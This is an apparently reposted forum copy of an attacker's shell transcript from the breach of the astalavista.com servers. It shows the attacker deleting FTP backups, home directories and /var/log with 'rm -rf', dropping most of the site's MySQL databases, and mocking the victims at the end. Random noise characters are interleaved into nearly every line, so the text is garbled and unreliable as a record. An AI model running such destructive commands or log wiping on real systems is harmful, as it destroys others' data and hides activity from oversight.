-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz26 F) z+ @+ V" c9 U& ~, m
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
5 y9 W1 Q1 f3 R4 P-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
" C/ V4 r7 i. Q4 A. U[snip]
+ k# F) p8 V2 `226 Transfer complete.
) d: P# ?" ]1 y. \* I) \$ wftp> mdelete *8 L+ Q) g% Y- X, Q2 r8 w
ftp> ls -la
p& y" y% I; C" `/ |- Q) i, s6 [227 Entering Passive Mode (212,254,194,163,2,193)6 R* J; r6 D; r
150 Opening BINARY mode data connection for ‘file list’.
3 A& A- I) U: I/ ~& c$ j. P226 Transfer complete.
, S* B1 C' K* c' x& l5 w) g. O' l+ Bftp>) u2 O4 e' O9 v8 D' c
7 j5 a# d' B8 w9 {( Esh-3.2# cd /home
' U) A" X' K- L. {/ Q3 k* A1 D7 Ksh-3.2# ls -la
$ G% B5 \# I1 C6 R, V* ~total 120
8 m# S$ ~/ i1 K+ p. @/ o* W1 [drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
`$ t0 t* @! Odrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
, ?! E& \ L' B9 e, K- edrwx–x–x 9 admin admin 4096 Nov 28 2007 admin# w3 r& a0 T2 V( ]4 r
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
6 j6 p. o/ Z$ e1 V. s- N, k-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
( D" I/ u4 k5 ~9 R* N* Jdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
* z7 M/ W! t. E2 o. R5 v2 t5 k+ Rdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
7 }( X; {* V+ ^drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
; q. i% M7 {# C) Wdrwx–x–x 10 com com 4096 Apr 28 12:40 com8 v' u: h0 v# a7 r9 j Q
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
, ?6 F; n% \4 E+ I8 s5 |drwx—— 3 jon jon 4096 Sep 21 2007 jon# O/ N/ V: A( p" q* n2 b. V% k3 z
drwx—— 2 root root 16384 Sep 11 2007 lost+found. y6 { S! }" C% q0 N
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
7 E/ G# L+ K4 Cdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
+ m6 ^5 j- ~9 h/ x7 Ddrwx—— 2 jon jon 4096 Sep 15 2007 test# r2 ]. s i% k& e9 N5 \1 q9 F
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp" n$ V8 h1 t' c1 B% G
* D; i# _1 y o- ]2 C& u# I# csh-3.2# rm -rf backup/
* D0 H: d! d( rsh-3.2# rm -rf backup.14161// L/ ~7 `8 G& P1 [
sh-3.2# rm -rf ftp/1 ^0 x9 m' v+ X9 F9 v8 b& b
sh-3.2# rm -rf jon/; n) y1 `- x( i8 y' `! m+ c/ t
sh-3.2# rm -rf my/
, ?& e8 Q8 |; Y( Y8 U/ O; Fsh-3.2# rm -rf mysqldata/
! S, }3 z) @6 N9 ~7 o2 H* jsh-3.2# rm -rf test/1 q% P+ N0 t- D
sh-3.2# rm -rf tmp/8 \, \! o' J' N2 q9 x( u1 i0 z0 s. S
sh-3.2# cd ~
* i3 W# W# s- N: V! Qsh-3.2# rm -rf *7 f' d$ j- \2 c& D3 Q/ q* o
sh-3.2# rm -rf /var/log/
" n: @4 y% ~4 y' \1 N$ I9 u, Grm: cannot remove directory `/var/log//proftpd’: Directory not empty& k$ X& L% }% D5 a3 E: i
sh-3.2# rm -rf /home/*
8 J& d; H9 P0 G# Lsh-3.2# mysql
* X6 M; E) |' TWelcome to the MySQL monitor. Commands end with ; or \g.8 ~% g6 j& y( k4 B$ F# ?# O
Your MySQL connection id is 4071564 e- V' T% ]* R+ m9 `
Server version: 5.0.45-community-log MySQL Community Edition (GPL)" @+ S; Q0 A4 I( g* [
, _6 A6 F/ B0 A1 P \ ^/ R& y9 PType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
' Q2 Q* F) _) Z2 |- r0 z* n/ [8 w7 B7 | O/ P- ]
mysql> show databases;; y2 O3 m2 \/ ^ Z1 `/ W) Y* Q9 p e
+———————–+2 _$ }- N! y3 ?9 L. f# x; c% r
| Database |
0 F; ^9 d$ L% p1 V; J0 b+———————–+
1 R3 Y: U" [1 X+ x| information_schema |
7 T2 |! Y' ~0 n% r| astanet_ads |% B8 S0 ^; F: Z2 M b- ]
| astanet_mailing_lists |
7 J( H- p+ U+ m* h( p| astanet_mediawiki |
7 c% p/ N8 [; d8 }| astanet_membersystem |
% g- Z6 s3 f3 N8 ?| com_contrexx |. Q- p3 Q. e8 K% y. x
| com_contrexx2 |- M" I Z# Q. }% n+ c
| com_contrexx2_live |; W a7 O. `: ~; R1 N
| da_roundcube |
/ X5 }; f% k, J$ W6 l0 n| dolphin |- f; X0 r8 C1 {1 n# A
| ideapool |# O6 H# N1 n2 v8 V+ |4 t
| mysql |: h1 ^( i$ F) O6 A, r8 |: c
| test |
7 ?* y: g% i8 A4 ?6 u. m" p| yourmaster |
3 V& ^+ U3 A& H- u1 S+———————–++ y7 L* F) e# x5 b+ {
14 rows in set (0.03 sec)
) H( I2 b# Y5 ]5 }7 R5 `2 F+ P( G/ k0 c+ E* ~/ D" i
mysql> drop database astanet_membersystem;% j" D8 ]1 |$ F0 o+ H n; c
droQuery OK, 46 rows affected (0.81 sec)( D V) U; N! E9 i
# g9 M+ B0 Y( q \ x! S
mysql> drop database com_contrexx;
: Q* g% |: e9 h9 i' v3 y, Q. ?Query OK, 211 rows affected (2.72 sec)1 w e6 g! I; q: b! o$ A3 D
9 J* r8 |0 Y1 j3 s9 w+ K& Lmysql> drop database com_contrexx2;
( K5 r6 }8 F9 P' w5 V7 JQuery OK, 237 rows affected (2.23 sec)
/ r% D! w R" V6 q& h8 P! A: i
1 {0 N8 ~* ~. xmysql> drop database com_contrexx2_live;
. v' f$ I1 p& {2 N; IQuery OK, 227 rows affected (7.63 sec)4 j" M0 A8 g9 m6 G9 y2 Z
7 A4 I/ ^- h/ \3 c: X0 q" E
mysql> drop database ideapool;
2 G- @! J# N" L2 G( {& A/ k% j4 z4 OQuery OK, 69 rows affected (0.19 sec)
: J l; q- ?8 D8 ~" N$ J# y2 h5 B) k% q7 W
mysql> drop database yourmaster;
" o' G; q* ?# u! B- T9 T7 V3 V. e! ]Query OK, 158 rows affected (0.55 sec)
0 e; d3 u4 b% V1 p
L+ K0 x' Z& g( q) d2 c1 Cmysql> drop database astanet_ads;1 i& Z7 w H: z/ M* i7 T
Query OK, 9 rows affected (0.11 sec)2 R0 D+ B5 l, W) D' p8 F
1 X, t. u" l# j/ Imysql> drop database astanet_mailing_lists;# w& m/ b3 q T& P ~- f0 F
Query OK, 24 rows affected (1.47 sec)0 p) I. y e' w7 F: g" ^
. I, w, L( {6 \1 \mysql> drop database astanet_mediawiki;
$ F3 j- R5 ], h) e8 w% iQuery OK, 31 rows affected (0.51 sec)
3 B" B. z! \9 P; B6 S
7 \+ R* G7 W8 j7 Cmysql> show databases;- v1 |# B& _/ x6 J+ E) h
+——————–+4 [3 G2 R" w: a8 o' v s5 X
| Database |% d1 b9 S& u+ ~2 d, v
+——————–+
1 x; ~$ } w( k9 L| information_schema |/ B3 q5 s9 |7 P2 M* h X) a, ~. |
| da_roundcube |
& {+ y$ f, x3 @7 [' Q| dolphin |7 X- I/ l3 e+ k: n5 g: ?* ], ~
| mysql |8 X4 M9 I, X0 a" n+ j
| test |
- u. V2 o* d: M) `- y. ^% b+——————–++ Z5 D8 ^5 j) P! m% t* @
5 rows in set (0.00 sec)
* e7 O) d" l$ n; G5 }" Y+ S. ]2 W9 o) ~. s) {
What a journey! We’re not sure exactly why the “Terminator” had any influence on) b* b: _ p+ s
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the$ ~. K) n* j, v7 A
wrong to say this pack of morons *wont be back*.9 w- P: h9 }/ y% u4 }: S+ W, W
|
发表于 2012-11-6 21:07:34
收藏
支持
反对